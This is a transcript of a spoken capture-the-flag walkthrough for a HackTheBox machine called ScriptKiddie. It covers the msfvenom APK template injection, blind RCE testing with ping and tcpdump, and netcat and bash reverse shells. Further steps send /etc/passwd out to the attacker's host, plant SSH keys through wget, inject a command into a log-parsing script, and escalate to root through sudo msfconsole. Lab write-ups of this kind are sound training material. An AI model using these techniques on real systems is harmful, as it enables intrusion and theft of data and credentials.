Welcome back, YouTube. Another week. Glad to have you guys back here. I am Justin from Parity InfoSec, and this is the newest retirement, ScriptKiddie. So ScriptKiddie is marked as an easy box, but honestly, this one brought back some flashbacks from when I was doing OSCP. There's a little bit of a struggle to get the remote code execution working, but it's a very, very good box to get that skill set up. There is a pre-made CVE with all the code. You need slight modifications in order to make it work. After that, we're going to do just a little bit of show and tell in terms of how to test for remote code execution when you can't really see what's going on in the box. So we'll do a little bit of blind testing using ping and tcpdump, as well as once we get through there, I'm going to serve my authorized keys and inject that into the SSH key for target user. That way we can get onto the box. That'll get us user, but then as we start to get into user 2 and into root, there's a bit of a struggle trying to look at the different shell script that's handed to you. There's one script, but you got to understand exactly what the script's doing to know how to get around it. So we'll go through there and we'll talk about some of the errors in the parsing with the cut fields, as well as how to actually get the command execution or the command inject working. To do that, you're going to need browser, a text editor. I said Python just because I used the HTTP server module in order to serve. There's a couple different ways to get things on your box. This one ended up being the easiest way for me, as well as we talked about tcpdump, so that'll be in there as well. Lots of good stuff in this box, so let's get started. Alright, so I will apologize right out of the gates. I am not at home with my normal box. I don't have my normal VMs. I don't have my normal tool sets with me, my normal mic. So my sound's going to be a little bit different this week. But I took it as a challenge because I really wanted to take another stab at the Pwn box. So I talked about it a couple of videos ago. I've done it in the past. This time it's a little bit more complicated, but still able to do everything we need to do. So let's go ahead and get started. I've got this open, and we'll just go to the bash up here, slightly different than my normal box, and we'll go ahead and do an Nmap. This box right now that we're going after is 10.10.10.226. So we'll just go ahead and run that Nmap. Really fast, you're going to see that there's two ports open, 22 SSH, and then a port 5000. So this port 5000, I like to go ahead and say 5000, and let's run scripts and all versions. This is going to take a little bit of a second to get going, but what you're going to find out is that this is running a Python web server. Here it comes back, workzug. It's Python 385, and then it also gives the title of the website, which is Kids Hacker Tools in Elite Speak. So let's go ahead and take a look at the web browser. Open it up nice and big, and we'll go to 10.10.10.226. And then we got to specify port 5000. Now that it's added it on here, it went directly to HTTPS. We'll take that back off. So this is where I have a little bit of trauma. When I did my OSCP, I was not successful when they had websites that were similar to this, where you've got to really know what you're doing with command execution and take advantage of some of these fields and some of the responses from the system for trying to keep hackers from doing silly things. So this is a good test for all of you to try and figure out. So we'll start with the first one. This one is looking for an IP. It says scan the top 100 ports of an IP. So if I say 127.0.0.1, that's going to be scanning this box that it's on. And as you see, it comes back and it automatically says port 22, port 5000. For me, if I say 10.10.14.8, that's my box. Let's see if it comes back with anything. So it does. It comes back with 22, 80, and 111. So it does see my box. It's good to know that I have connectivity. if I try to do command execution, I go 10.14.8, and then there's a couple different ways you can do it. Let's do a semicolon, and then we'll just say ls, so list. It's going to come back and it's going to say invalid IP. I'll show you in a little bit that there's actually some checking going on in the background, and one of them is to just reg search, make sure that the IP is an IP and it fits in the format of an IP. Go ahead and scroll down to the bottom one, which is exploits. It's trying to do search exploits. So similar to your own box, if you were to run search exploit and you say Python, it'll run through all the exploits that are available, and it'll generate an output right here. And that is what you would assume is command execution. So it's running this in the shell and then taking the output and giving it back to you. So naturally you would think, let's say Python, and then let's try and run an ls. Well, this box also checks for things like that, and it says, stop hacking me, we'll hack you back. So there's a little bit of a defensive mechanism here. I mean, you can try a bunch of different things. Python, you can say tack ls, try and get it to run certain things. Same thing's going to keep coming back. Just stop hacking me, stop hacking me. And that'll come into handy when we start looking at how to get root. But for right now, two of our avenues for command execution are out the window. This one is here, and it has msfvenom, and it's got a payload for Windows, Linux, and Android. You can just come in here and say 127.0.0.1. I'm not going to give it a template, and I'm going to generate. It'll go through the process of generating a payload for you. Kind of a nifty little thing. It just runs the msfvenom toolset. So it says, okay, this is our payload, this is our host, this is our output, no template, and then it gives you an executable that you can download. And it expires in 5 minutes, so it'll delete that automatically after 5 minutes. Cool. That gets you a payload. The same thing exists for Linux. However, if you run just 127.0.0.1 with no template, and you say just say generate, mine always comes back with an error. It takes a minute, so it just says something went wrong. It's not really built well for that. The last one you got is Android, and when you click on it, let's go ahead and refresh the page because it should give you a pop-up, but you can't see the pop-up right now because it says something went wrong still. This generate. Okay, let's try this again. You go down to Android. 27.0.0.1. I guess it's not going to do it. It'll try and generate the payload just like everything else, and it will say, here's your payload. It comes out with an APK. If you were to go in here and try and inject files as templates, it gets a little weird. You come into Android, and this is just messing with it, but if you go ahead and you do a search function here, and you just say msfvenom exploit, it's going to be kind of random, but the first one that does come up is something called the msfvenom apk template command inject. So if you go into this one, this is an exploit from the 6.0.11 framework. And it was put out last year by Justin Stephen, and it kind of runs through, hey, if you make this APK file, and then you try to run this through Venom, it will run this payload that's up here. And honestly, this was trial and error. I already showed you can't get command execution, but we can go ahead and try this template injection. So we'll go ahead and copy this down, and then we'll save it. And then I will open up Places, into my downloads. Here I've got this file. I'm going to go ahead and open it with Pluma. You can use any text editor. You can use command line toolset as well. So with this one, you're going to run Python 3. You're going to have this payload here. It says change me. So this payload can be anything. It's going to try and encode it. It's going to run it through all these different tools, one of which is key store, trying to sign it. It's going to be self-signed. And through this process, it will also try to go through the jar signer, do all this. In order to make this happen, we're going to go ahead and change the payload first. And the reason that I wanted to talk about this first is when you don't know, in this case, you're not going to see anything, and I don't exactly know how we need to do our reverse shell. I prefer to do what's just considered blind injection, blind code execution. And to check that, use tcpdump to view pings coming back on your system. So I'll just write this one by hand. So ping, make sure to put a count on it. Sometimes I like to put something that's not 4. Generically, Windows will do a set of 4. I like to make sure that it's a number that I generated and not just randomly came about. So with 5, I'm going to say 10.10.14.8. In order to check this, we'll go ahead and save this. And we will open up a new terminal. Let's go into downloads. And we're going to say Python 3, run this script, and it's going to generate an APK file. In this case, the first thing you're going to find out is it doesn't have jar signer. So when I did the investigation in this one, this is an issue with trying to use PWNBOX, because my box at home has all the right software to do this. PWNBOX is actually just missing the Java development kit, the JDK, and it just isn't installed by default. Not a hard problem to fix. You just come in here and do sudo apt-get install, and then you can do open JDK, just new version 8 JDK, and then it'll take a minute for it to download. And this is one of those things where you're going to burn some of your time on the system, but not too bad. All right. So we'll clear that, and then we'll go ahead and try and run that script again. And you can see that it's trying to make this payload right here. Just ping 5 times to 10.10.14.8, which you can see up here is my VPN number. It says the jar was signed, self-signed. Here is where the APK is at. And then it tells you to run this. We're going to go ahead, because we're using a website, the website kind of does all this for us. And then it'll run the msfvenom for us. So just a little oddity, we don't have to run this command. But we do need to know where this evil APK is at. And then we need to set up our tcpdump. So I'll go ahead. I'm going to have a couple windows open because we're going to be bouncing back and forth. So this one we're going to do sudo tcpdump. I'm going to say interface is ton0. I'm going to say it's ICMP traffic, and host is, actually I don't even have to put host, and 10.10.10.226. No? Maybe it is. There we go. So it's going to be looking for this 226 ICMP traffic on tunnel 0. Now we're going to go back to the website. We're going to go to this one, and we generated that payload. So we'll just go in here. We'll save this junk information. If you were to try and inject files, like if I was going to type this and just say generate, it's going to come back with an error saying that you have to use an APK template file. So That's what I was looking for earlier. It's right there. We'll go ahead and type this in. None of this matters because it's really just triggering on what's inside of the payload section of our file. The easiest way I found to do this is the sort by modified, because I had to generate many different temps. So the most recent one is going to be this one right here at 705. And it should be about 2K. We'll go ahead and generate that. And by generating it, we should be able to come over here and see once it runs it, here's our requests. So 1, 2, 3, 4, 5, I think is in there. 1, 2, 3, 4, 5. Okay, so that was my traffic, and I know that I'm getting my command execution, but it gets a little wonky from here. I was not super successful with different commands here. If you run any kind of let's say just a standard NC, I'm not going to waste your time. So this version of netcat does not allow for the -e, the tac E, but if you try to run, let's go ahead and pull up some reverse shells in here. So reverse shells, payload all the things. If you come into the payload all the things and you just try to run a bash, we'll copy this, we'll copy this and take it over to our Pluma. We'll go ahead and put it right in there. When you put it in there, we'll go 10.10 14.8. And then I like to run most of my stuff on 9999. Go ahead and save that. And this is where you run into the issue of doing this repeatedly over and over and over and over again. We're going to come over here. You're going to run this script again. This script is going to generate a new file. Unfortunately, this one isn't going to generate a file. And you'll see if you come into this code that it's going to base 64 encode to avoid bad characters, and keytool is picky. So sure enough, keytool is having an error trying to put all these different characters in there, and it's just not working. So this shell's not going to work. A reverse netcat won't work. So we got to get a little bit more creative with the way you go about this. So there's a variety of ways that you can do this. Let's go ahead and make sure that it connects. So I'll leave that there, 14.8, 9999. And we will do a netcat, but we'll just let it hang, just to show that it's working. So we'll run this again, generate a new APK. All right, inside of this, actually we'll use this other shell because we're done with tcpdump. That's all I wanted to show you for that. So we'll just do nc nblp 9999. Get that listening. We've already generated this code, this shell code, that's going to connect back on 9999. So we go over to our website and we upload the new APK. Android, give it an L host. And this is where the reason I sorted by modified time is I'm going to look for the newest random temp file. You can go back and have it overwrite itself if you want. You can change some of the code from the original generator. There's a way that you can completely script this as well. That's just not how this POC was built. If I happen to have more time, if I wasn't at this box, I would probably do that just to show you guys the capabilities of what you can do if you understand Python. You can completely automate this whole entire system and turn it almost into its own little shell. Really nifty ways that you can go about this stuff. I'm going to go ahead and use this APK. And again, this APK is going to connect to 9999. We just verify it's up before we hit the APK. So generate. And we'll come over here and kind of hang out. What you're looking for is right here in this box, it's going to be going. You can see it connected. I can say ID. I can say who am I. It's not a. It would look like a chat shell on the other side. It's not actually executing code because you can't get bash to work like that. So we'll just go ahead and kill this. But we know that it's connecting. We know that it's talking. We know that it's doing things. What else can we make it do? Well, I'm going to go ahead and start this up again. We'll go back to Pluma. And another way that you could check this is to push files into it. If you can't interact with it, you can at least push files in. So etc password. I'm going to say take etc password, push it through this netcat, and we should see it on the other side. Go ahead and save this. Come back over here. We will generate the code. It's good to go there. And then we'll just pull up the newest temp. So this one right here. You just keep going this way. This is the part that, you know, I'm making it look easy, but this is not how easy it was going along. There's so many things that go wrong that you can't tell because it's blind injection. You don't know what's going on the backside, so it's very frustrating. But if you come over here, you will see that it pushed etc password through here. You're going to see there's a root, all these things. You go down to the bottom, you're going to see that it does have two kind of handmade users in the 1000 and above, and that's kid and pwn. They both have home directories, so home kid, home pwn. So not being able to interact, I can go look at things myself by hand. It's a little frustrating again of going over and over and over again with this. Now I'm going to say if I try to do remote code execution, it actually doesn't work that way. It's not going to push a activity through the pipe. It's not going to redirect. It's not going to work the way you want it to. But what I've learned in the past is I can make it do an action, save it to a file, and then I can come back and have it do something with that file. So in this case, I'm going to say ls lia. I want you to do it on home kid, and that's going to be saved into temp parity. All right, so we'll go ahead and save that. And this is where we have to bounce between things. So we'll come over here, we'll regenerate the new file. I'll go ahead and clean this up, get it ready. We're going to have to do this in two phases. So the first thing is we're going to make it generate the file. So we'll browse this, go to the newest temp, open it up, go. And because this one happens over and over and over and over again for me, let's make sure we generate this one. Okay. This one that we're about to do happens so much that I'm actually going to save this one so I don't have to keep regenerating it. And that is simply going to be nc 10.10.14.8 9999 push the file temp parity into it. So this is just going to take whatever we put in the other one, generate it, push it back through. Done deal. We'll save that. Generate that one. And that will be this XOZ. So I want to move temp /temp XOZ to temp /read. We're just going to call it read because that is going to be the APK that I'm going to constantly hit up to read the files. So that one's good to go. Let's go ahead and read. So keep going about this. And this is the part that I'm saying you could easily script. It'd be super simple. We'll take this APK. We'll go ahead and generate it, and then we'll come over to this window with 9999, and we're going to wait to see what comes out. So hopefully this should be the listing for the home kid directory. And it is. Perfect. So you're going to see that there is no bash history. It's going to dev null. There's an SSH folder here. We'll take a look at that. There's an HTML folder, the logs, and our user text is here. So you can pull the user text right now. But what I'm going to do is try and get myself a shell. And the best way to do that is this directory right here, SSH. So we got to generate a new payload. This time, I want to ls-lia homekid.ssh and pipe it into, or push it into the temp parity. Let's go ahead and just make sure that we close it out. Save it. I'm going to come over here and generate a new file, new APK. I'm going to clean this up again. So I'm just going to control, clean up the screen, and run it again. I know it's really confusing. There's a lot going on here. It's just, that is the frustration with this box. So we'll go ahead and pull that APK. Make sure we're on Android. Put that in there. And this is now going to push everything from the SSH folder into there. I could have done an LIAR, capital R recursive, back in that first request, but it gets a little sloppy. Right now, we're just kind of stepping through little bit by little bit. So it's already, it's still processing that. Just finished processing. So we'll come back in here. We'll run our read script and just have it read that file that we just made again. Generate it, and then we'll come back over here and read it. So when we read this, you're going to see, it actually looks like somebody else is playing around on the box, or it's changing authorized keys. That's really strange. That's okay. This one's a bit of a struggle because the way that I did this box is I overwrote the authorized keys. It looks like it's doing a swap. Somebody else might be playing around in there. I hate to do that to people. Let's see what happens if we try to cat that. I just want to see what's in there real quick. Okay, so I got a connection, but I didn't get anything. And I'm going to err on the side of it's a null file. There's nothing going on. So let's go ahead and just proceed with the way I was going to do it. It is a little bit messier. It's not user-friendly with other people on the network. But for this case, I'm just demonstrating. There's a couple different ways to do it. We've shown that you can write a command to a file and then read that file to get kind of that shell execution. What I want to try and do is echo into the authorized keys, which we've done in the past plenty of times. But the challenge is I don't have an SSH key. So I have to actually come in, because this is the PWN box, I got to generate one every time, which is fine. That's safe. I'm not going to put any passphrases on this, but I've now generated my SSH key. So if I say cat here, SSH, I want the ID RCE.pub. This is what we want to cat into our folder, into our authorized keys. Let's see if I can pull it over. All right, pretty long one here. And you can copy this. I run into a little bit of an issue because of the base64 encoding. It's already base64 encoded, gets all sloppy. So trying to write this into the APK doesn't work. So I found a different way of going about this. And I'll just go ahead and nano authorized keys. And I will paste this in here. And so I'll paste it into my own folder that I call, or my own file called authorized keys. And then this is where I start up my Python server. So mhttp.server, and I'll run it on 4/8. And so now I'm serving. This is where I got a little creative. So there's so many ways to go about this, but this one was the best way I could come up with through all this frustration. And this is why I say it's kind of traumatized me, because this was the box I couldn't beat when I was doing OSCP. But I got new tricks. So in this case, I want a wget. I'm going to come back to my computer, port 8888, and then I'm going to ask for authorized keys. Now, I'm missing the Z. Authorized keys. I can't just wget because it's going to wget it into whatever folder we're going into. I want to output it, so a capital O, and then I'm going to say the full path because it doesn't like the tilde for your home directory. So homekid.ssh/authorized keys. And this is just going to take my file, write it into that file, and then we'll be able to SSH into the box. I want to, oh, I got a spelling mistake. Authorized. So it didn't write to the right folder. Shucks. Well, that's okay. I know I said shucks. We'll generate that APK again. We'll do it again. We got to make sure when we do that that we turn our Python server back on. Android is there. We will browse to the newest temp file. I'm really tempted just to write the script to show you how much easier this could be if you scripted it out. But we'll go ahead and wait for it to pull down. So it pulled it again. Hopefully this time it's saved into the right file. So I'll just come back here. I'll tell go to kid using my ID RSA key. And it's hanging out. And now I am kid at ScriptKiddie. We're sitting inside that folder. So if I lslia, I got full script. And you're going to see right away cat user.txt. We got user. A little bit of a struggle, keep using that word, but this is not my native system. So it's always going to be a little bit harder. This box, even though it was easy, is a little bit more frustrating if you don't have these skills down. I never would have been able to get through this a year or two ago, just because it's so, you got to go step by step and check all the blind spots along the way. I've removed a lot of stuff that I tried that didn't work, and I focused on just what did work. So for right now, we've got our user. What else can we access? Well, we know that there's an HTML folder here. So if we go into cd HTML, we're going to look at that. That's going to be app.py. So if we cat app.py, we're going to see that this is the application that's running on the server right now. And this is where we start reading into code. We'll go all the way up to the top just so you understand what's going on here. There is the regex IP that I was talking about, where it's going to make sure that it is an IP. If it doesn't, it's going to fail the test. Same thing with alphanumeric. So if you're trying to mess with anything, it's going to kick it out. It does say that your Windows should be in exe, your Linux should be in elf, and your Android should be in APK. So it kind of gives that information inside this file. Those are the only ones that would have been accepted, and that's why you can't do any other kind of injection methodology here. It will take a get or a post, and then it just looks to see is it get, then go pull down index.html. If it's a scan, you're going to run scan using the IP. If it's a generate, you're going to run venom with the request, and then search exploit with the request. So we'll step through these. Scan is going to say if it matches in that regex, if it matches IP, go ahead. Let's proceed. If the IP doesn't, isn't a remote address and start with 1010.1 or 1010.10, then just kind of forget about it. But if it is, go ahead and run the NMap and subprocess check output. If I had my tcpdump here, you would have seen the 100 requests to my IP, or the 10 requests, I guess. This is top 10. Don't see information. Top 100. So you would have seen the top 100 port requests going through the system. In search exploit, this is where it says, is it alphanumeric? Basically remove any special characters, which is why you couldn't really do command inject through search exploit. If it's else, that's when it does this. It opens home kid logs hackers, so that's a file, and then it's going to write the date, time, and then the IP. So it takes a record of your IP, and then it kicks back and it says, stop hacking me, we'll hack back. The last one here is the venom, and that's where it generates the msfvenom. If it's an invalid host IP, it doesn't match the regex. If you don't put in a proper host IP, it's going to kick it out. So you can't do command injection there either. As you go through here, this is where you would kick it into that error, the CVE for the apt-get. So that's pretty much how you sum this up, but it did reference a file. So I want to go back out and go to logs. So there is a file here called hackers, and when you put in any bad information, it's going to log your IP and the date and time inside this file. Right now it's showing 0. What happens is this file is deleted, reset all the time, so it's really hard to catch it at the exact moment. So I'm not going to worry too much about that, but I can show it to you. So if I say while true, so be careful with the while true statement because it will lock up the system. Do tail on the hackers file, and then we'll say done. And then we'll just control C out of it when we're done. And I just want to show you nothing's in that file, nothing's in that file. But if I come over here and I try to do something, so if I want to say Python ls like we did earlier, and then we search, you're going to see over here what happens. It logs the information as it's logged as date space time space IP, and this is going to be important here in a second. So I wanted you to see how it's logged because that's going to be critical here. You're going to see that this file is accessible by the group pwn. Well, let's see if we can take a look at pwn. So we'll come back out here into home, and you know that there was another user called pwn. So cd pwn, and it lets us in. So we'll go ahead and take a look at what's in that folder. You can see that the bash history goes to garbage. The SSH we're not able to look at. Recon we're not able to look at because we're not in the pwn group. There's only one file that we can look at that is accessible by everybody, and that's called scanlosers.sh. So let's cat scanlosers.sh and just see what this file does. So it's a bash script, and it's going to say the log is here. So this is that logs hackers. It says go into your pwn directory. It's going to cat the log, so pull the log. It's going to cut using a delimiter, so the -d. I use this a lot, but in this case I'm going to see why you can run into some issues. So cat based off of space, and then it has tac f3 tac. So I ran through a couple executions of this before I really figured this out. I usually will use -f3 if I want the third field, and this is just to cut it down to the exact fields you want. But if you say -f3 dash, it's actually going to pull the third field and everything else behind it. So everything will get pulled in, and then it's going to sort for unique. So when it had that kick, and when it kicked out like 8 different lines, it's going to sort for unique, only find 1. And then it's going to say while read IP, so it's going to say that that is IP. That third field on is your IP. You're going to go ahead and run shell with the command of nmap. So you're going to nmap those top ports, top 10 ports. You're going to save it to recon with this ip.nmap, and then you're going to put the IP into the field dev null. Done. And then it's going to look at the log. If it's greater than 0, then you're going to echo empty into the log. So that's why I say it erases the log. So no big deal. So there's two things that you got to understand in this script itself. And I already explained one, which is it's going to pull the third field and everything after. And the third field is going to start after 2 spaces. The first field starts right away. The second field has a space, then second field, and then space, third field. So there needs to be 2 spaces followed by whatever you want to do. The next thing you got to understand is that it's going to try and execute this shell command, NMap, blah, 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 blah. And then you have the ability to put something in here. And when it's all said and done, it's going to kick it out to dev null. Or it's going to kick errors out to dev null. But in here, you have the ability to inject whatever you want. But you got to be careful because it doesn't quite work that way. And I'm going to show you real quick how. So if we go back to the log file, let's go ahead and go to log. So we'll go back, one directory, kid, logs. Again, this is where the file hackers is at, so I'm going to echo something into hackers. So here I'm going to say space, space, semicolon, and then I'll say nc 10.10.14.8 on port 9999. And that should just open up a port and kind of stop right there. And then I'll echo that into hackers. If I open a new port over here, NB-LP9999, the question becomes, will it pop up? So I echoed that into the folder. I got a connection back. So this did work in terms of injecting something. From here it gets a little weird though, because it's hard to inject something. If I come in here, I know I can't do a netcat. Here, let's just try it. Netcat 10.10.14.8 9999 tac e bin bash. And this is what I told you before. I'm just verifying this is an invalid option. So this one doesn't do a tac e. You can try and come in here and generate that TCP reverse shell. So going back here, we'll pull this out, copy that, and put it into here. It is going to throw a fit here in a second, so just let it go. Oh, no, not that time. So if I say 10.10.14.8 9999, you would think that this would make a shell back to me. Let's just go ahead and make sure that that's sitting there at 9999. Hit enter, the hacker thing works, but nothing pops up. And this is just through trial and error. I had to really figure this out. But you have to run a bash inside of a bash. It's another one of those frustrating concepts. So if I run bin bash c and I run a command and then I run a bash inside of a bash, and we'll just close it out with a single quote here. So bin bash, run the command, bash this. It allows it to run as an independent process. And when we try that, it writes to hackers, hackers does its thing, comes back and it says ambiguous redirect. So it runs bin bash, but it's processing a 1.nmap. And that goes back to the original request, which had the nmap information in there. And this is the second part of trying to understand how that script works. It's going to keep running. So if I cat home pawn, what was it, scan losers. If I show you this, it's going to still run the Nmap, and it's trying to save it into this file. It doesn't know how to do that, because right now it's trying to save it, and that's where you're getting this ambiguous file from up here. This ambiguous redirect is trying to redirect into 1.nmap, and that's just part of trying to redirect it right here, and that's not what we want to do. And the best way to do this is using something you'll see a lot in SQL, which is commented out. And it took me a while to figure this out. And that is, you want to let the first script comment out while not commenting out the second script. And that's just saying, here's my semicolon to start the new action, run the action, and then comment it out to say, forget about everything else. Forget everything else. Because what you're trying to do is you're trying to get it to run this successfully and then stop everything else. Don't go back and try and make this Nmap. You don't want to do that. So if you run it like this, you're going to see that it popped up a connection, and we are now pawn at ScriptKiddie. Success. We are user 2. If you come in here and you do an lslia, you're going to see there's a recon folder. So if I go into cd recon and I run this, you're going to see that it did run an Nmap on my system that first time that I said, hey, why don't you go ahead and just let's go ahead and do this one ls or whatever it was, and so it ran it. So if I cat 10.10 14.8.nmap, it's going to come back and say, oh, okay, off of these are the top 10. You had one that was filtered, the rest were closed. So that's what it's doing in the background. I'm not really concerned with recon. I could go in and get an SSH. So if I go to cd ssh lslia, you're going to have the same thing that we had before, which is the authorized keys is right there. You can inject the authorized keys, except who's the owner of the file? The owner of the file is root. The group is root. Therefore, we don't have the permissions in Pwn to write to our own authorized keys. So this is part of the box maker just holding us out a little bit. So there's no way to go in and just SSH into the box, but that's not what we're so worried about. We'll go ahead and back out. And this is where you go into your normal enumeration. There's a lot of different things that you can do. You can go ahead and run linpiece and all that other stuff, but I don't have my tool set here. So just starting with the basics, we'll do a sudo tac-l. Super basic, and it does have something in there. I can see that the user Pwn, that's myself, can run with no password sudo msfconsole. Go ahead and make this big. Pwn, we're going to be able to do sudo msfconsole. And we'll just go ahead and let that run. It's going to take a second to boot up, just like every other MSF console that you've used before. So this one's definitely based on MSF. I don't have a standard input-output, so it is going to give me a lot of errors, but that's okay. If I wanted to do some funny stuff here, I could say ID. And it's going to say, I am running as root, root, root. So I can say, cat etc shadow. I shouldn't be able to do that, but because I'm sitting as root, I can pull all the keys out now. Okay, so what else can we do? Well, we can go straight for the jugular, and we can say, give me the root.txt. But I want to go even easier than that, because MSF console still allows you to run commands. So I'm going to run sh. Actually, I'll run bash. Give me a bash shell. Okay, it executed bash. I don't see anything, but if I say ID, I'm sitting as that. If I say print working directory, it's going to say I'm in home pawn. This is where I normally will just come in here and say Python 3 C import pty.spawn bin bash. This is just a generic way for me to get a enhanced shell, and it's going to say I am root at ScriptKiddie. Cool. Let's go to root. If I look in here, got everything I need. I see that there is a root.txt, so let's go ahead and cat root.txt, and we've got it. So there are super easy things in this box and super difficult things. A lot of this box is just trying and trying and trying, and then understanding basic scripting. I hope that I was able to add something to your knowledge base. I apologize for my setup. My audio is going to be a little off. My editing is going to be a little off. My phone box is a little bit off. So that's just the nature of not being at home. So thank you for watching. I hope that you got a lot out of this. I want to thank XDF. Great box. I love watching what you're doing. And this one was a fun one. Hope to see you guys again next time. Have a great week.